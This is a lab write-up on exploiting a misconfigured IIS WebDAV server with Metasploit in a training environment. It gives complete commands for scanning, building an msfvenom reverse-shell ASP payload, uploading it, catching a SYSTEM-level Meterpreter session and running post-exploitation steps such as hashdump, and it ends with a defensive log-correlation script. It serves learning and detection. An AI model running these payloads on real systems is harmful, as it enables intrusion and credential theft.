Exploiting WebDAV using Metasploit

WebDAV misconfiguration exploitation to gain remote access. Explains scanning, module selection, and session handling.

Tools/Skills:
Web Exploit
Metasploit
MSF
Posted on November 18, 2025

Method 1: Using msfvenom

Environment / interfaces

  • Host IPs on attacker machine:

    • eth0: 10.1.0.24/16

    • eth1: 10.10.37.16/24 ← used as LHOST for payload

  • Target: demo.ine.local (10.2.30.66)


Discovery (Nmap)

Commands used:

nmap -sC -sV demo.ine.local
nmap -sV --script=http-enum -p80 demo.ine.local

Key findings:

  • HTTP (80) → Microsoft-IIS/10.0

    • WebDAV methods present: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK

    • /webdav/ exists and requires authentication (401 Unauthorized)

  • SMB/RPC/NetBIOS: 135, 139, 445 open

  • RDP: 3389 open (IIS host Windows Server 2019, build 17763)

  • MySQL: 3306 open (unauthorized)

Notes:

  • http-enum flagged /webdav/ as interesting and protected by basic auth.

Payload creation (msfvenom)

Command executed:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.37.16 LPORT=2807 -f asp > shell.asp

Observed output:

  • Payload chosen: windows/meterpreter/reverse_tcp (x86)

  • Payload size: 354 bytes

  • ASP final file: 38233 bytes

Interpretation:

  • msfvenom wrapped raw shellcode inside an ASP stub suitable for upload to IIS with WebDAV PUT.

Upload via WebDAV (cadaver)

Steps:

  1. cadaver http://demo.ine.local → initial / returned 401 Unauthorized

  2. open http://demo.ine.local/webdav/ → provided credentials:

    • Username: bob

    • Password: (interactive)

  3. Listing /webdav/ showed files.

  4. Upload:

put /root/shell.asp

Result:

  • shell.asp uploaded successfully to /webdav/shell.asp.

Notes:

  • Using valid credentials avoided brute-forcing. Always ensure the attack does not cause a DoS.

Metasploit handler and session

Commands:

service postgresql start
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.37.16
set LPORT 2807
run

Outcome:

  • Handler started on 10.10.37.16:2807.

  • Meterpreter session established from 10.2.30.66.

  • meterpreter session opened.

Verification commands shown:

meterpreter > sysinfo   # shows Computer: AD-IIS, OS: Windows Server 2019, Meterpreter: x86/windows
meterpreter > getuid    # Server username: NT AUTHORITY\SYSTEM

Implication:

  • The uploaded shell.asp executed and staged a Meterpreter payload.

  • The Meterpreter process is running as NT AUTHORITY\SYSTEM.


Lessons / key points

  • IIS with WebDAV and writable /webdav/ can accept server-side payloads (ASP) and execute them if ASP execution is allowed.

  • msfvenom output must match server-side technology. Example: use -f asp for IIS with ASP enabled.

  • Use an authenticated upload when possible to avoid noisy brute-force attempts.

  • Confirm architecture/bitness: msfvenom created x86 payload; Meterpreter reported x86/windows but sysinfo showed x64 OS. That works via WoW64 or x86 process execution on x64 OS.

  • After getting a session, confirm privileges (getuid) and sysinfo before further actions.


Quick checklist for replication

  1. nmap -sC -sV demo.ine.local

  2. nmap -sV --script=http-enum -p80 demo.ine.local

  3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f asp > shell.asp

  4. cadaver http://demo.ine.local/webdav/ → put shell.asp

  5. msfconsole → use exploit/multi/handler

  6. set payload windows/meterpreter/reverse_tcp

  7. set LHOST <attacker-ip>; set LPORT <port>

  8. run → wait for session

  9. meterpreter> sysinfo and meterpreter> getuid


Recommended next steps (for learning)

  • Inspect shell.asp to see the wrapper and staging process.

  • Verify whether ASP execution can be restricted by web.config. Check web.config in /webdav/.

  • Practice post-exploitation safely in lab: enumerate services, dump SAM/LSA, escalate persistence only on allowed targets.

  • Log and document every command and timestamps for reproducibility.

Method 2: WebDAV exploit via Metasploit module (demo.ine.local)

Goal

Authenticated file upload to IIS WebDAV and remote code execution using Meterpreter.

Module

exploit/windows/iis/iis_webdav_upload_asp

Why this works

  • WebDAV allows PUT, MOVE, COPY.

  • IIS executes .asp under Classic ASP.

  • Module uploads payload as .txt, then renames to .asp with MOVE or COPY, executes it, and optionally deletes.


Minimal runbook

1) Find module

search iis upload
use exploit/windows/iis/iis_webdav_upload_asp

2) Configure auth and target

set HttpUsername bob
set HttpPassword password_123321
set RHOSTS 10.2.30.66
set RPORT 80
# If virtual host needed:
# set VHOST demo.ine.local

3) Payload and listener

# Defaults to windows/meterpreter/reverse_tcp
set LHOST 10.10.37.16
set LPORT 4444

4) WebDAV path and method

set PATH /webdav/metasploit.asp
set METHOD move   # or: copy

5) Exploit

exploit

Expected console flow

  • Upload .txt → Move to .asp → Execute → Attempt delete → Meterpreter session opens.

Evidence from the run

  • Handler: 10.10.37.16:4444

  • Upload: /webdav/metasploit.txt → /webdav/metasploit.asp

  • Session: Meterpreter x86 on Windows Server 2019 (10.0.17763)

  • Privilege: NT AUTHORITY\SYSTEM

  • Post actions:

    • Browsed c:\windows\system32\inetsrv and c:\

    • Read c:\flag.txt:

      d3aff16a801b4b7d36b4da1094bee345


Quick post-exploitation checklist

sysinfo
getuid
getpid
ps
getprivs
ipconfig
route
hashdump            # if permitted
wmic product get    # software inventory via shell
ls -la              # enumerate sensitive dirs

Persistence and data access only in lab scope.


Common pitfalls and fixes

  • 401 Unauthorized: set HttpUsername and HttpPassword.

  • 403 Forbidden or 405 Method Not Allowed: WebDAV write not permitted or ASP execution blocked in that directory. Try another DAV path or verify web.config execution rules.

  • 404 on PATH: wrong virtual directory. Confirm with nmap --script http-enum or manual browse.

  • No callback:

    • Wrong LHOST or blocked LPORT. Use attacker interface IP visible to target (ifconfig showed eth1: 10.10.37.16).

    • Perimeter filter on egress. Try common ports (80, 443, 53) if allowed in lab.

  • x86 Meterpreter on x64 OS: normal. Migrate to a 64-bit process if needed:

    ps
    migrate <pid_of_64bit_w3wp_or_explorer_if_available>

  • Virtual host routing: set VHOST demo.ine.local if the server uses host headers.


OPSEC notes for labs

  • Module is noisy: PUT, MOVE, and an HTTP GET for execution. Expect IIS and DAV logs.

  • Delete step may fail. Manually clean: del /q via shell or rm via meterpreter if allowed.
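
The same noise seen from the defender's side, as an added example (not part of the original write-up or of Metasploit): it correlates a successful PUT/MOVE/COPY with a later request for a script file of the same directory and base name from the same client. The log lines are constructed, and the field order, extension list and five-minute window are assumptions; the sample's fields carry no MOVE destination, so the rename is inferred from the follow-up GET.

```python
import posixpath
from datetime import datetime, timedelta

# Constructed sample lines in the default IIS W3C field order (not from the lab).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-11-18 10:01:02 10.2.30.66 PROPFIND /webdav/ - 80 bob 10.10.37.16 cadaver - 207 0 0 15
2025-11-18 10:01:09 10.2.30.66 PUT /webdav/shell.asp - 80 bob 10.10.37.16 cadaver - 201 0 0 31
2025-11-18 10:01:30 10.2.30.66 GET /webdav/shell.asp - 80 - 10.10.37.16 curl - 200 0 0 120
2025-11-18 10:20:00 10.2.30.66 PUT /webdav/metasploit.txt - 80 bob 10.10.37.16 Mozilla - 201 0 0 20
2025-11-18 10:20:01 10.2.30.66 MOVE /webdav/metasploit.txt - 80 bob 10.10.37.16 Mozilla - 201 0 0 12
2025-11-18 10:20:02 10.2.30.66 GET /webdav/metasploit.asp - 80 bob 10.10.37.16 Mozilla - 200 0 0 95
2025-11-18 10:30:00 10.2.30.66 PUT /webdav/report.docx - 80 alice 10.1.0.50 Office - 201 0 0 40
2025-11-18 10:30:05 10.2.30.66 GET /webdav/report.docx - 80 alice 10.1.0.50 Office - 200 0 0 10
"""

SCRIPT_EXT = {".asp", ".aspx", ".ashx"}   # script extensions to watch (assumed list)
DAV_WRITE = {"PUT", "MOVE", "COPY"}
WINDOW = timedelta(minutes=5)             # assumed correlation window

def parse(log_text):
    """Yield one dict per request, keyed by the names on the #Fields line."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            yield row

def find_upload_then_execute(log_text):
    """Flag script requests preceded by a DAV write to the same dir/basename from the same client."""
    writes, alerts = {}, []
    for r in parse(log_text):
        path = r["cs-uri-stem"].lower()
        stem, ext = posixpath.splitext(posixpath.basename(path))
        key = (r["c-ip"], posixpath.dirname(path), stem)
        if r["cs-method"] in DAV_WRITE and r["sc-status"].startswith("2"):
            writes.setdefault(key, []).append((r["ts"], r["cs-method"], path))
        elif r["cs-method"] in ("GET", "POST") and ext in SCRIPT_EXT:
            chain = [w for w in writes.get(key, []) if r["ts"] - w[0] <= WINDOW]
            if chain:
                alerts.append({"client": r["c-ip"], "executed": path,
                               "writes": [f"{m} {p}" for _, m, p in chain]})
    return alerts

if __name__ == "__main__":
    for alert in find_upload_then_execute(SAMPLE_LOG):
        print(alert)
```

Both methods on this page match: the direct PUT of shell.asp and the module's PUT of a .txt followed by MOVE and a GET of the .asp. The ordinary document upload in the sample does not.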


Compare to manual method

  • Manual: msfvenom ASP → cadaver PUT → browse to trigger → handler.

  • Module: One command path. Handles upload, rename, execute, cleanup. Faster for repeatability.


Reproduce fast

use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.2.30.66
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/pwn.asp
set LHOST 10.10.37.16
set LPORT 4444
set METHOD move
run